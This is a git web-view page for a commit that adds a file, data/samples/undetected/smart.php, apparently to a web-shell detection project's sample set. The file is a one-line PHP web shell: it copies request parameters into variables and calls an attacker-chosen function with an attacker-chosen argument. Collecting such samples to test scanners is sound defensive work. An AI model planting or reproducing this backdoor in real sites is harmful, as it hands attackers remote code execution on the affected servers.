summaryrefslogtreecommitdiff
path: root/data/samples/undetected/smart.php
diff options
context:
space:
mode:
authorMathieu Deous2022-05-02 20:18:23 +0200
committerGitHub2022-05-02 20:18:23 +0200
commit48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch)
treef4e69551f1368aa048edf46b7b061600f3668329 /data/samples/undetected/smart.php
parentbbc738e16f8b637afde58d65196374af98a5e0e2 (diff)
Make application go-install-able and create a docker image
Diffstat (limited to 'data/samples/undetected/smart.php')
-rw-r--r--data/samples/undetected/smart.php2
1 files changed, 2 insertions, 0 deletions
diff --git a/data/samples/undetected/smart.php b/data/samples/undetected/smart.php
new file mode 100644
index 0000000..f358562
--- /dev/null
+++ b/data/samples/undetected/smart.php
@@ -0,0 +1,2 @@
1<?php extract($_REQUEST); @die($ctime($atime));
2